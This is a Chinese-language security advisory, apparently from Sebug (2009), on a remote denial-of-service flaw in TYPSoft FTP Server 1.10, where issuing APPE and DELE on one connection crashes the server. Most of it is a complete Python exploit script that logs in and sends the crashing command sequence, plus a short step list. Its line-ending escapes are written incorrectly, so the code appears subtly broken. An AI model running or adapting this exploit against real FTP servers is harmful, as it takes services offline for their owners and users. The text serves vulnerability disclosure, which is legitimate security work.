TYPSoft FTP Server APPE和DELE命令远程拒绝服务漏洞
来源:岁月联盟
时间:2009-11-28
TYPSoft TYPSoft FTP Server 1.10漏洞描述:
BUGTRAQ ID: 37114
TYPSoft FTP Server是一款简单易用的FTP服务程序。
TYPSoft FTP Server中存在拒绝服务漏洞,用户登录到服务器后对同一个套接字连接同时使用APPE和DELE命令就会导致服务器崩溃:
1.sock.connect((hostname, 21))
2.sock.send("user %s/r/n" %username)
3.sock.send("pass %s/r/n" %passwd)
4.sock.send("PORT 127,0,0,1,122,107/r/n")
5.sock.send("APPE "+ test_string +"/r/n")
6.sock.send("DELE "+ test_string +"/r/n")
7.sock.close()<*参考
leinakesi (leinakesi@gmail.com)
*>
测试方法:
[www.sebug.net]
本站提供程序(方法)可能带有安全性,仅供安全研究与教学之用,风险自负!Exploit example:
#!/usr/bin/python
import socket
import sys
import time
def Usage():
print ("Usage: ./expl.py <local_ip> <serv_ip> <Username> <password>/n")
print ("Example:./expl.py 127.0.0.1 127.0.0.1 anonymous anonymous/n")
print ("Example:./expl.py 192.168.48.183 192.168.48.111 anonymous anonymous/n")
if len(sys.argv) <> 5:
Usage()
sys.exit(1)
else:
local=sys.argv[1]
hostname=sys.argv[2]
username=sys.argv[3]
passwd=sys.argv[4]
test_string="a"*30
ip_every=local.split(’.’)
for i in range(1,10000):
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock_data = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((hostname, 21))
except:
print ("Connection error!")
sys.exit(1)
r=sock.recv(1024)
print "[+] "+ r
sock.send("user %s/r/n" %username)
print "[-] "+ ("user %s/r/n" %username)
r=sock.recv(1024)
print "[+] "+ r
sock.send("pass %s/r/n" %passwd)
print "[-] "+ ("pass %s/r/n" %passwd)
r=sock.recv(1024)
print "[+] "+ r
sock_data.bind((local,31339))
sock_data.listen(1)
sock.send("PORT " + ip_every[0] +","+ ip_every[1] +","+ ip_every[2] +"," + /
ip_every[3] + ",122,107/r/n") print "[-] "+ ("PORT " + local + "122,107/r/n")
r=sock.recv(1024)
print "[+] "+ r
sock.send("APPE "+ test_string +"/r/n")
print "[-] "+ ("APPE "+ test_string +"/r/n")
r=sock.recv(1024)
print "[+] "+ r
sock.send("DELE "+ test_string +"/r/n")
print "[-] "+ ("DELE "+ test_string +"/r/n")
r=sock.recv(1024)
print "[+] "+ r
sock.close()
sock_data.close()
time.sleep(2)
sys.exit(0);SEBUG安全建议:
厂商补丁:
TYPSoft
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://en.typsoft.com/